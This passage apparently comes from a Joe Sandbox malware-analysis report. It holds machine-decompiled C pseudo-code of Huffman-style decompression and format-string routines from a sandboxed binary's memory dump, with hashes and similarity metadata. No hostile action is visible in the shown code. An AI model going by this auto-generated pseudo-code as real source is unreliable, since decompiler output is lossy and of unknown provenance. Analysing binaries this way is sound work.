                                                    										_t157 =  *(_t190 + 0xc88 + _t98 * 2) & 0x0000ffff;
                                                    										L28:
                                                    										_t184 = 0x10;
                                                    										__eflags = _t157 - _t184;
                                                    										if(_t157 >= _t184) {
                                                    											_t99 = 0x12;
                                                    											__eflags = _t157 - _t99;
                                                    											if(__eflags >= 0) {
                                                    												_t158 = _t186;
                                                    												if(__eflags != 0) {
                                                    													_t193 = (E00CCA898(_t158) >> 9) + 0xb;
                                                    													__eflags = _t193;
                                                    													_push(7);
                                                    												} else {
                                                    													_t193 = (E00CCA898(_t158) >> 0xd) + 3;
                                                    													_push(3);
                                                    												}
                                                    												_pop(_t101);
                                                    												E00CCA881(_t186, _t101);
                                                    												while(1) {
                                                    													_t193 = _t193 - 1;
                                                    													__eflags = _t140 - 0x194;
                                                    													if(_t140 >= 0x194) {
                                                    														goto L46;
                                                    													}
                                                    													 *(_t201 + _t140 + 0x28) = 0;
                                                    													_t140 = _t140 + 1;
                                                    													__eflags = _t193;
                                                    													if(_t193 != 0) {
                                                    														continue;
                                                    													}
                                                    													L44:
                                                    													_t190 = _t187 + 0x3c50;
                                                    													goto L45;
                                                    												}
                                                    												break;
                                                    											}
                                                    											__eflags = _t157 - _t184;
                                                    											_t167 = _t186;
                                                    											if(_t157 != _t184) {
                                                    												_t198 = (E00CCA898(_t167) >> 9) + 0xb;
                                                    												__eflags = _t198;
                                                    												_push(7);
                                                    											} else {
                                                    												_t198 = (E00CCA898(_t167) >> 0xd) + 3;
                                                    												_push(3);
                                                    											}
                                                    											_pop(_t121);
                                                    											E00CCA881(_t186, _t121);
                                                    											__eflags = _t140;
                                                    											if(_t140 == 0) {
                                                    												goto L47;
                                                    											} else {
                                                    												while(1) {
                                                    													_t198 = _t198 - 1;
                                                    													__eflags = _t140 - 0x194;
                                                    													if(_t140 >= 0x194) {
                                                    														goto L46;
                                                    													}
                                                    													 *(_t201 + _t140 + 0x28) =  *((intOrPtr*)(_t201 + _t140 + 0x27));
                                                    													_t140 = _t140 + 1;
                                                    													__eflags = _t198;
                                                    													if(_t198 != 0) {
                                                    														continue;
                                                    													}
                                                    													goto L44;
                                                    												}
                                                    												break;
                                                    											}
                                                    										}
                                                    										 *(_t201 + _t140 + 0x28) =  *((intOrPtr*)(_t140 + _t187 + 0xe4c8)) + _t157 & 0x0000000f;
                                                    										_t140 = _t140 + 1;
                                                    										goto L45;
                                                    									}
                                                    									_t170 = 4 + _t94 * 4 + _t190;
                                                    									__eflags = _t170;
                                                    									while(1) {
                                                    										__eflags = _t181 -  *_t170;
                                                    										if(_t181 <  *_t170) {
                                                    											break;
                                                    										}
                                                    										_t94 = _t94 + 1;
                                                    										_t170 = _t170 + 4;
                                                    										__eflags = _t94 - 0xf;
                                                    										if(_t94 < 0xf) {
                                                    											continue;
                                                    										}
                                                    										goto L27;
                                                    									}
                                                    									 *(_t201 + 0x10) = _t94;
                                                    									goto L27;
                                                    								}
                                                    								_t171 = 0x10;
                                                    								_t185 = _t181 >> _t171 - _t93;
                                                    								_t174 = ( *(_t185 + _t190 + 0x88) & 0x000000ff) +  *(_t186 + 4);
                                                    								 *_t186 =  *_t186 + (_t174 >> 3);
                                                    								 *(_t186 + 4) = _t174 & 0x00000007;
                                                    								_t157 =  *(_t190 + 0x488 + _t185 * 2) & 0x0000ffff;
                                                    								goto L28;
                                                    							}
                                                    							_t130 = E00CD4DC4(_t187);
                                                    							__eflags = _t130;
                                                    							if(_t130 == 0) {
                                                    								goto L47;
                                                    							}
                                                    							goto L19;
                                                    							L45:
                                                    							__eflags = _t140 - 0x194;
                                                    						} while (_t140 < 0x194);
                                                    						L46:
                                                    						 *((char*)(_t187 + 0xe661)) = 1;
                                                    						__eflags =  *_t186 -  *((intOrPtr*)(_t187 + 0x84));
                                                    						if( *_t186 <=  *((intOrPtr*)(_t187 + 0x84))) {
                                                    							_push(0x12b);
                                                    							_push(_t187 + 0xa0);
                                                    							_push(_t201 + 0x30);
                                                    							E00CD3797();
                                                    							_push(0x3c);
                                                    							_push(_t187 + 0xf8c);
                                                    							_push(_t201 + 0x15b);
                                                    							E00CD3797();
                                                    							_push(0x11);
                                                    							_push(_t187 + 0x1e78);
                                                    							_push(_t201 + 0x197);
                                                    							E00CD3797();
                                                    							_push(0x1c);
                                                    							_push(_t187 + 0x2d64);
                                                    							_push(_t201 + 0x1a8);
                                                    							E00CD3797();
                                                    							E00CE0320(_t187 + 0xe4c8, _t201 + 0x2c, 0x194);
                                                    							return 1;
                                                    						}
                                                    						goto L47;
                                                    					}
                                                    					 *((intOrPtr*)(_t187 + 0xe65c)) = 1;
                                                    					return E00CD2F75(_t179, _t205, _t187, _t187 + 0xe4c4);
                                                    				} else {
                                                    					L47:
                                                    					return 0;
                                                    				}
                                                    			}








































                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                    • Instruction ID: ae8b1a342f7841b3e35451c7bde938ed2b53b82941bd6f8fc60a1bdaa7945338
                                                    • Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                    • Instruction Fuzzy Hash: 789145B02003499BDB2CEF68D899BBE77D5EB60304F10092EE796873C2DB749646D352
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 86%
                                                    			E00CD43BF(void* __ecx) {
                                                    				signed int _t70;
                                                    				signed int _t71;
                                                    				signed int _t72;
                                                    				signed int _t75;
                                                    				signed int _t76;
                                                    				signed int _t77;
                                                    				void* _t79;
                                                    				char _t90;
                                                    				signed int _t94;
                                                    				void* _t97;
                                                    				signed int _t108;
                                                    				unsigned int _t112;
                                                    				intOrPtr* _t114;
                                                    				signed int _t117;
                                                    				intOrPtr _t118;
                                                    				signed int _t124;
                                                    				signed int _t127;
                                                    				signed int _t128;
                                                    				signed int _t134;
                                                    				signed int _t136;
                                                    				void* _t138;
                                                    				signed int _t141;
                                                    				void* _t142;
                                                    				intOrPtr* _t143;
                                                    				void* _t147;
                                                    				intOrPtr* _t153;
                                                    				intOrPtr* _t156;
                                                    				void* _t157;
                                                    				signed int _t160;
                                                    				unsigned int _t165;
                                                    				void* _t168;
                                                    				signed int _t169;
                                                    				signed int _t171;
                                                    				signed int _t172;
                                                    				intOrPtr* _t175;
                                                    				void* _t177;
                                                    				void* _t178;
                                                    
                                                    				_t177 = __ecx;
                                                    				if( *((char*)( *((intOrPtr*)(_t178 + 8)) + 0x11)) != 0) {
                                                    					_t175 =  *((intOrPtr*)(_t178 + 0x1dc));
                                                    					__eflags =  *((char*)(_t175 + 8));
                                                    					if( *((char*)(_t175 + 8)) != 0) {
                                                    						L5:
                                                    						_t171 = 0;
                                                    						__eflags = 0;
                                                    						do {
                                                    							_t112 = E00CCA898(_t175) >> 0xc;
                                                    							E00CCA881(_t175, 4);
                                                    							__eflags = _t112 - 0xf;
                                                    							if(_t112 != 0xf) {
                                                    								 *(_t178 + _t171 + 0x18) = _t112;
                                                    								goto L14;
                                                    							}
                                                    							_t127 = E00CCA898(_t175) >> 0x0000000c & 0x000000ff;
                                                    							E00CCA881(_t175, 4);
                                                    							__eflags = _t127;
                                                    							if(_t127 != 0) {
                                                    								_t128 = _t127 + 2;
                                                    								__eflags = _t128;
                                                    								while(1) {
                                                    									_t128 = _t128 - 1;
                                                    									__eflags = _t171 - 0x14;
                                                    									if(_t171 >= 0x14) {
                                                    										break;
                                                    									}
                                                    									 *(_t178 + _t171 + 0x18) = 0;
                                                    									_t171 = _t171 + 1;
                                                    									__eflags = _t128;
                                                    									if(_t128 != 0) {
                                                    										continue;
                                                    									}
                                                    									break;
                                                    								}
                                                    								_t171 = _t171 - 1;
                                                    								goto L14;
                                                    							}
                                                    							 *(_t178 + _t171 + 0x18) = 0xf;
                                                    							L14:
                                                    							_t171 = _t171 + 1;
                                                    							__eflags = _t171 - 0x14;
                                                    						} while (_t171 < 0x14);
                                                    						_push(0x14);
                                                    						_t114 =  *((intOrPtr*)(_t178 + 0x1e8)) + 0x3bb0;
                                                    						_push(_t114);
                                                    						_push(_t178 + 0x18);
                                                    						 *((intOrPtr*)(_t178 + 0x20)) = _t114;
                                                    						E00CD3797();
                                                    						_t172 = 0;
                                                    						__eflags = 0;
                                                    						do {
                                                    							__eflags =  *((char*)(_t175 + 8));
                                                    							if( *((char*)(_t175 + 8)) != 0) {
                                                    								L19:
                                                    								_t70 = E00CCA89D(_t175);
                                                    								_t71 =  *(_t114 + 0x84);
                                                    								_t165 = _t70 & 0x0000fffe;
                                                    								__eflags = _t165 -  *((intOrPtr*)(_t114 + 4 + _t71 * 4));
                                                    								if(_t165 >=  *((intOrPtr*)(_t114 + 4 + _t71 * 4))) {
                                                    									_t134 = 0xf;
                                                    									_t72 = _t71 + 1;
                                                    									 *(_t178 + 0x10) = _t134;
                                                    									__eflags = _t72 - _t134;
                                                    									if(_t72 >= _t134) {
                                                    										L27:
                                                    										_t136 =  *(_t175 + 4) +  *(_t178 + 0x10);
                                                    										 *_t175 =  *_t175 + (_t136 >> 3);
                                                    										_t75 =  *(_t178 + 0x10);
                                                    										 *(_t175 + 4) = _t136 & 0x00000007;
                                                    										_t138 = 0x10;
                                                    										_t141 =  *((intOrPtr*)(_t114 + 0x44 + _t75 * 4)) + (_t165 -  *((intOrPtr*)(_t114 + _t75 * 4)) >> _t138 - _t75);
                                                    										__eflags = _t141 -  *_t114;
                                                    										asm("sbb eax, eax");
                                                    										_t76 = _t75 & _t141;
                                                    										__eflags = _t76;
                                                    										_t77 =  *(_t114 + 0xc88 + _t76 * 2) & 0x0000ffff;
                                                    										L28:
                                                    										_t142 = 0x10;
                                                    										__eflags = _t77 - _t142;
                                                    										if(_t77 >= _t142) {
                                                    											_t168 = 0x12;
                                                    											__eflags = _t77 - _t168;
                                                    											if(__eflags >= 0) {
                                                    												_t143 = _t175;
                                                    												if(__eflags != 0) {
                                                    													_t117 = (E00CCA898(_t143) >> 9) + 0xb;
                                                    													__eflags = _t117;
                                                    													_push(7);
                                                    												} else {
                                                    													_t117 = (E00CCA898(_t143) >> 0xd) + 3;
                                                    													_push(3);
                                                    												}
                                                    												_pop(_t79);
                                                    												E00CCA881(_t175, _t79);
                                                    												while(1) {
                                                    													_t117 = _t117 - 1;
                                                    													__eflags = _t172 - 0x1ae;
                                                    													if(_t172 >= 0x1ae) {
                                                    														goto L46;
                                                    													}
                                                    													 *(_t178 + _t172 + 0x2c) = 0;
                                                    													_t172 = _t172 + 1;
                                                    													__eflags = _t117;
                                                    													if(_t117 != 0) {
                                                    														continue;
                                                    													}
                                                    													L44:
                                                    													_t114 =  *((intOrPtr*)(_t178 + 0x14));
                                                    													goto L45;
                                                    												}
                                                    												break;
                                                    											}
                                                    											__eflags = _t77 - _t142;
                                                    											_t153 = _t175;
                                                    											if(_t77 != _t142) {
                                                    												_t124 = (E00CCA898(_t153) >> 9) + 0xb;
                                                    												__eflags = _t124;
                                                    												_push(7);
                                                    											} else {
                                                    												_t124 = (E00CCA898(_t153) >> 0xd) + 3;
                                                    												_push(3);
                                                    											}
                                                    											_pop(_t97);
                                                    											E00CCA881(_t175, _t97);
                                                    											__eflags = _t172;
                                                    											if(_t172 == 0) {
                                                    												L48:
                                                    												_t90 = 0;
                                                    												L50:
                                                    												return _t90;
                                                    											} else {
                                                    												while(1) {
                                                    													_t124 = _t124 - 1;
                                                    													__eflags = _t172 - 0x1ae;
                                                    													if(_t172 >= 0x1ae) {
                                                    														goto L46;
                                                    													}
                                                    													 *(_t178 + _t172 + 0x2c) =  *((intOrPtr*)(_t178 + _t172 + 0x2b));
                                                    													_t172 = _t172 + 1;
                                                    													__eflags = _t124;
                                                    													if(_t124 != 0) {
                                                    														continue;
                                                    													}
                                                    													goto L44;
                                                    												}
                                                    												break;
                                                    											}
                                                    										}
                                                    										 *(_t178 + _t172 + 0x2c) = _t77;
                                                    										_t172 = _t172 + 1;
                                                    										goto L45;
                                                    									}
                                                    									_t156 = _t114 + (_t72 + 1) * 4;
                                                    									while(1) {
                                                    										__eflags = _t165 -  *_t156;
                                                    										if(_t165 <  *_t156) {
                                                    											break;
                                                    										}
                                                    										_t72 = _t72 + 1;
                                                    										_t156 = _t156 + 4;
                                                    										__eflags = _t72 - 0xf;
                                                    										if(_t72 < 0xf) {
                                                    											continue;
                                                    										}
                                                    										goto L27;
                                                    									}
                                                    									 *(_t178 + 0x10) = _t72;
                                                    									goto L27;
                                                    								}
                                                    								_t157 = 0x10;
                                                    								_t169 = _t165 >> _t157 - _t71;
                                                    								_t160 = ( *(_t169 + _t114 + 0x88) & 0x000000ff) +  *(_t175 + 4);
                                                    								 *_t175 =  *_t175 + (_t160 >> 3);
                                                    								 *(_t175 + 4) = _t160 & 0x00000007;
                                                    								_t77 =  *(_t114 + 0x488 + _t169 * 2) & 0x0000ffff;
                                                    								goto L28;
                                                    							}
                                                    							__eflags =  *_t175 -  *((intOrPtr*)(_t177 + 0x84)) - 5;
                                                    							if( *_t175 <=  *((intOrPtr*)(_t177 + 0x84)) - 5) {
                                                    								goto L19;
                                                    							}
                                                    							_t94 = E00CD4E52(_t177);
                                                    							__eflags = _t94;
                                                    							if(_t94 == 0) {
                                                    								goto L48;
                                                    							}
                                                    							goto L19;
                                                    							L45:
                                                    							__eflags = _t172 - 0x1ae;
                                                    						} while (_t172 < 0x1ae);
                                                    						L46:
                                                    						 *((char*)(_t177 + 0xe662)) = 1;
                                                    						__eflags =  *((char*)(_t175 + 8));
                                                    						if( *((char*)(_t175 + 8)) != 0) {
                                                    							L49:
                                                    							_t118 =  *((intOrPtr*)(_t178 + 0x1e8));
                                                    							_push(0x132);
                                                    							_push(_t118);
                                                    							_push(_t178 + 0x2c);
                                                    							E00CD3797();
                                                    							_push(0x40);
                                                    							_push(_t118 + 0xeec);
                                                    							_push(_t178 + 0x166);
                                                    							E00CD3797();
                                                    							_t147 = 0x10;
                                                    							_push(_t147);
                                                    							_push(_t118 + 0x1dd8);
                                                    							_push(_t178 + 0x1a6);
                                                    							E00CD3797();
                                                    							_push(0x2c);
                                                    							_push(_t118 + 0x2cc4);
                                                    							_push(_t178 + 0x1b6);
                                                    							E00CD3797();
                                                    							_t90 = 1;
                                                    							goto L50;
                                                    						}
                                                    						__eflags =  *_t175 -  *((intOrPtr*)(_t177 + 0x84));
                                                    						if( *_t175 <=  *((intOrPtr*)(_t177 + 0x84))) {
                                                    							goto L49;
                                                    						}
                                                    						goto L48;
                                                    					}
                                                    					__eflags =  *_t175 -  *((intOrPtr*)(__ecx + 0x84)) - 0x19;
                                                    					if( *_t175 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
                                                    						goto L5;
                                                    					}
                                                    					_t108 = E00CD4E52(__ecx);
                                                    					__eflags = _t108;
                                                    					if(_t108 == 0) {
                                                    						goto L48;
                                                    					}
                                                    					goto L5;
                                                    				}
                                                    				return 1;
                                                    			}








































                                                    0x00cd4677
                                                    0x00cd4608
                                                    0x00cd460e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd460e
                                                    0x00cd43f2
                                                    0x00cd43f4
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd43f6
                                                    0x00cd43fb
                                                    0x00cd43fd
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd43fd
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                    • Instruction ID: 59add1a23be4f4217d4a2af988b56b097ea5d4b4075c0942baf6a74c3e6c820a
                                                    • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                    • Instruction Fuzzy Hash: 49813B713043469BDB2CDE68D8D5BBD77D4AB91308F00092FFB968B382DA70C9869756
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 84%
                                                    			E00CE51C9(void* __ecx, void* __edi) {
                                                    				signed int _v8;
                                                    				signed int _v12;
                                                    				signed int _v16;
                                                    				void* __ebx;
                                                    				void* __esi;
                                                    				signed int _t52;
                                                    				signed int _t54;
                                                    				signed int _t55;
                                                    				void* _t56;
                                                    				signed int _t57;
                                                    				signed char _t60;
                                                    				signed char _t62;
                                                    				signed int _t64;
                                                    				void* _t65;
                                                    				signed int _t66;
                                                    				signed char _t75;
                                                    				signed char _t78;
                                                    				void* _t86;
                                                    				void* _t88;
                                                    				signed char _t90;
                                                    				signed char _t92;
                                                    				signed int _t93;
                                                    				signed int _t95;
                                                    				signed int _t97;
                                                    				signed int _t98;
                                                    				signed int _t101;
                                                    				void* _t103;
                                                    				signed int _t109;
                                                    				unsigned int _t111;
                                                    				signed char _t113;
                                                    				unsigned int _t121;
                                                    				void* _t122;
                                                    				signed int _t123;
                                                    				short _t124;
                                                    				void* _t127;
                                                    				void* _t128;
                                                    				void* _t129;
                                                    				signed int _t130;
                                                    				void* _t131;
                                                    				void* _t133;
                                                    				void* _t134;
                                                    
                                                    				_t122 = __edi;
                                                    				_t52 =  *0xcfe7ac; // 0x349e4b74
                                                    				_v8 = _t52 ^ _t130;
                                                    				_t129 = __ecx;
                                                    				_t101 = 0;
                                                    				_t121 = 0x41;
                                                    				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
                                                    				_t103 = 0x58;
                                                    				_t133 = _t54 - 0x64;
                                                    				if(_t133 > 0) {
                                                    					__eflags = _t54 - 0x70;
                                                    					if(__eflags > 0) {
                                                    						_t55 = _t54 - 0x73;
                                                    						__eflags = _t55;
                                                    						if(_t55 == 0) {
                                                    							L9:
                                                    							_t56 = E00CE5BFB(_t129);
                                                    							L10:
                                                    							if(_t56 != 0) {
                                                    								__eflags =  *((intOrPtr*)(_t129 + 0x30)) - _t101;
                                                    								if( *((intOrPtr*)(_t129 + 0x30)) != _t101) {
                                                    									L71:
                                                    									_t57 = 1;
                                                    									L72:
                                                    									return E00CDFBBC(_t57, _t101, _v8 ^ _t130, _t121, _t122, _t129);
                                                    								}
                                                    								_t121 =  *(_t129 + 0x20);
                                                    								_push(_t122);
                                                    								_v16 = _t101;
                                                    								_t60 = _t121 >> 4;
                                                    								_v12 = _t101;
                                                    								_t123 = 0x20;
                                                    								__eflags = 1 & _t60;
                                                    								if((1 & _t60) == 0) {
                                                    									L46:
                                                    									_t109 =  *(_t129 + 0x32) & 0x0000ffff;
                                                    									__eflags = _t109 - 0x78;
                                                    									if(_t109 == 0x78) {
                                                    										L48:
                                                    										_t62 = _t121 >> 5;
                                                    										__eflags = _t62 & 0x00000001;
                                                    										if((_t62 & 0x00000001) == 0) {
                                                    											L50:
                                                    											__eflags = 0;
                                                    											L51:
                                                    											__eflags = _t109 - 0x61;
                                                    											if(_t109 == 0x61) {
                                                    												L54:
                                                    												_t64 = 1;
                                                    												L55:
                                                    												_t124 = 0x30;
                                                    												__eflags = _t64;
                                                    												if(_t64 != 0) {
                                                    													L57:
                                                    													_t65 = 0x58;
                                                    													 *((short*)(_t130 + _t101 * 2 - 0xc)) = _t124;
                                                    													__eflags = _t109 - _t65;
                                                    													if(_t109 == _t65) {
                                                    														L60:
                                                    														_t66 = 1;
                                                    														L61:
                                                    														__eflags = _t66;
                                                    														asm("cbw");
                                                    														 *((short*)(_t130 + _t101 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
                                                    														_t101 = _t101 + 2;
                                                    														__eflags = _t101;
                                                    														L62:
                                                    														_t127 =  *((intOrPtr*)(_t129 + 0x24)) -  *((intOrPtr*)(_t129 + 0x38)) - _t101;
                                                    														__eflags = _t121 & 0x0000000c;
                                                    														if((_t121 & 0x0000000c) == 0) {
                                                    															E00CE4490(_t129 + 0x448, 0x20, _t127, _t129 + 0x18);
                                                    															_t131 = _t131 + 0x10;
                                                    														}
                                                    														E00CE5F16(_t129 + 0x448,  &_v16, _t101, _t129 + 0x18,  *((intOrPtr*)(_t129 + 0xc)));
                                                    														_t111 =  *(_t129 + 0x20);
                                                    														_t101 = _t129 + 0x18;
                                                    														_t75 = _t111 >> 3;
                                                    														__eflags = _t75 & 0x00000001;
                                                    														if((_t75 & 0x00000001) != 0) {
                                                    															_t113 = _t111 >> 2;
                                                    															__eflags = _t113 & 0x00000001;
                                                    															if((_t113 & 0x00000001) == 0) {
                                                    																E00CE4490(_t129 + 0x448, 0x30, _t127, _t101);
                                                    																_t131 = _t131 + 0x10;
                                                    															}
                                                    														}
                                                    														E00CE5DF8(_t129, 0);
                                                    														__eflags =  *_t101;
                                                    														if( *_t101 >= 0) {
                                                    															_t78 =  *(_t129 + 0x20) >> 2;
                                                    															__eflags = _t78 & 0x00000001;
                                                    															if((_t78 & 0x00000001) != 0) {
                                                    																E00CE4490(_t129 + 0x448, 0x20, _t127, _t101);
                                                    															}
                                                    														}
                                                    														_pop(_t122);
                                                    														goto L71;
                                                    													}
                                                    													_t86 = 0x41;
                                                    													__eflags = _t109 - _t86;
                                                    													if(_t109 == _t86) {
                                                    														goto L60;
                                                    													}
                                                    													_t66 = 0;
                                                    													goto L61;
                                                    												}
                                                    												__eflags = _t64;
                                                    												if(_t64 == 0) {
                                                    													goto L62;
                                                    												}
                                                    												goto L57;
                                                    											}
                                                    											_t128 = 0x41;
                                                    											__eflags = _t109 - _t128;
                                                    											if(_t109 == _t128) {
                                                    												goto L54;
                                                    											}
                                                    											_t64 = 0;
                                                    											goto L55;
                                                    										}
                                                    										goto L51;
                                                    									}
                                                    									_t88 = 0x58;
                                                    									__eflags = _t109 - _t88;
                                                    									if(_t109 != _t88) {
                                                    										goto L50;
                                                    									}
                                                    									goto L48;
                                                    								}
                                                    								_t90 = _t121 >> 6;
                                                    								__eflags = 1 & _t90;
                                                    								if((1 & _t90) == 0) {
                                                    									__eflags = 1 & _t121;
                                                    									if((1 & _t121) == 0) {
                                                    										_t92 = _t121 >> 1;
                                                    										__eflags = 1 & _t92;
                                                    										if((1 & _t92) == 0) {
                                                    											goto L46;
                                                    										}
                                                    										_v16 = _t123;
                                                    										L45:
                                                    										_t101 = 1;
                                                    										goto L46;
                                                    									}
                                                    									_push(0x2b);
                                                    									L40:
                                                    									_pop(_t93);
                                                    									_v16 = _t93;
                                                    									goto L45;
                                                    								}
                                                    								_push(0x2d);
                                                    								goto L40;
                                                    							}
                                                    							L11:
                                                    							_t57 = 0;
                                                    							goto L72;
                                                    						}
                                                    						_t95 = _t55;
                                                    						__eflags = _t95;
                                                    						if(__eflags == 0) {
                                                    							L28:
                                                    							_push(_t101);
                                                    							_push(0xa);
                                                    							L29:
                                                    							_t56 = E00CE5993(_t129, _t122, __eflags);
                                                    							goto L10;
                                                    						}
                                                    						__eflags = _t95 - 3;
                                                    						if(__eflags != 0) {
                                                    							goto L11;
                                                    						}
                                                    						_push(0);
                                                    						L13:
                                                    						_push(0x10);
                                                    						goto L29;
                                                    					}
                                                    					if(__eflags == 0) {
                                                    						_t56 = E00CE5B70(__ecx);
                                                    						goto L10;
                                                    					}
                                                    					__eflags = _t54 - 0x67;
                                                    					if(_t54 <= 0x67) {
                                                    						L30:
                                                    						_t56 = E00CE56F9(_t101, _t129);
                                                    						goto L10;
                                                    					}
                                                    					__eflags = _t54 - 0x69;
                                                    					if(_t54 == 0x69) {
                                                    						L27:
                                                    						_t3 = _t129 + 0x20;
                                                    						 *_t3 =  *(_t129 + 0x20) | 0x00000010;
                                                    						__eflags =  *_t3;
                                                    						goto L28;
                                                    					}
                                                    					__eflags = _t54 - 0x6e;
                                                    					if(_t54 == 0x6e) {
                                                    						_t56 = E00CE5ADD(__ecx, _t121);
                                                    						goto L10;
                                                    					}
                                                    					__eflags = _t54 - 0x6f;
                                                    					if(_t54 != 0x6f) {
                                                    						goto L11;
                                                    					}
                                                    					_t56 = E00CE5B51(__ecx);
                                                    					goto L10;
                                                    				}
                                                    				if(_t133 == 0) {
                                                    					goto L27;
                                                    				}
                                                    				_t134 = _t54 - _t103;
                                                    				if(_t134 > 0) {
                                                    					_t97 = _t54 - 0x5a;
                                                    					__eflags = _t97;
                                                    					if(_t97 == 0) {
                                                    						_t56 = E00CE553C(__ecx);
                                                    						goto L10;
                                                    					}
                                                    					_t98 = _t97 - 7;
                                                    					__eflags = _t98;
                                                    					if(_t98 == 0) {
                                                    						goto L30;
                                                    					}
                                                    					__eflags = _t98;
                                                    					if(__eflags != 0) {
                                                    						goto L11;
                                                    					}
                                                    					L17:
                                                    					_t56 = E00CE58FB(_t129, __eflags, _t101);
                                                    					goto L10;
                                                    				}
                                                    				if(_t134 == 0) {
                                                    					_push(1);
                                                    					goto L13;
                                                    				}
                                                    				if(_t54 == _t121) {
                                                    					goto L30;
                                                    				}
                                                    				if(_t54 == 0x43) {
                                                    					goto L17;
                                                    				}
                                                    				if(_t54 <= 0x44) {
                                                    					goto L11;
                                                    				}
                                                    				if(_t54 <= 0x47) {
                                                    					goto L30;
                                                    				}
                                                    				if(_t54 != 0x53) {
                                                    					goto L11;
                                                    				}
                                                    				goto L9;
                                                    			}
                                                    0x00000000
                                                    0x00ce5413
                                                    0x00ce5363
                                                    0x00ce5364
                                                    0x00ce5367
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5369
                                                    0x00000000
                                                    0x00ce5369
                                                    0x00ce5350
                                                    0x00ce5352
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5352
                                                    0x00ce533d
                                                    0x00ce533e
                                                    0x00ce5341
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5343
                                                    0x00000000
                                                    0x00ce5343
                                                    0x00000000
                                                    0x00ce5330
                                                    0x00ce5321
                                                    0x00ce5322
                                                    0x00ce5325
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5325
                                                    0x00ce52f0
                                                    0x00ce52f3
                                                    0x00ce52f5
                                                    0x00ce5300
                                                    0x00ce5302
                                                    0x00ce530a
                                                    0x00ce530c
                                                    0x00ce530e
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5310
                                                    0x00ce5314
                                                    0x00ce5314
                                                    0x00000000
                                                    0x00ce5314
                                                    0x00ce5304
                                                    0x00ce52f9
                                                    0x00ce52f9
                                                    0x00ce52fa
                                                    0x00000000
                                                    0x00ce52fa
                                                    0x00ce52f7
                                                    0x00000000
                                                    0x00ce52f7
                                                    0x00ce522b
                                                    0x00ce522b
                                                    0x00000000
                                                    0x00ce522b
                                                    0x00ce52b7
                                                    0x00ce52b7
                                                    0x00ce52ba
                                                    0x00ce528c
                                                    0x00ce528c
                                                    0x00ce528d
                                                    0x00ce528f
                                                    0x00ce5291
                                                    0x00000000
                                                    0x00ce5291
                                                    0x00ce52bc
                                                    0x00ce52bf
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce52c5
                                                    0x00ce5234
                                                    0x00ce5234
                                                    0x00000000
                                                    0x00ce5234
                                                    0x00ce5260
                                                    0x00ce52a3
                                                    0x00000000
                                                    0x00ce52a3
                                                    0x00ce5262
                                                    0x00ce5265
                                                    0x00ce5298
                                                    0x00ce529a
                                                    0x00000000
                                                    0x00ce529a
                                                    0x00ce5267
                                                    0x00ce526a
                                                    0x00ce5288
                                                    0x00ce5288
                                                    0x00ce5288
                                                    0x00ce5288
                                                    0x00000000
                                                    0x00ce5288
                                                    0x00ce526c
                                                    0x00ce526f
                                                    0x00ce5281
                                                    0x00000000
                                                    0x00ce5281
                                                    0x00ce5271
                                                    0x00ce5274
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5278
                                                    0x00000000
                                                    0x00ce5278
                                                    0x00ce51f0
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce51f6
                                                    0x00ce51f8
                                                    0x00ce5238
                                                    0x00ce5238
                                                    0x00ce523b
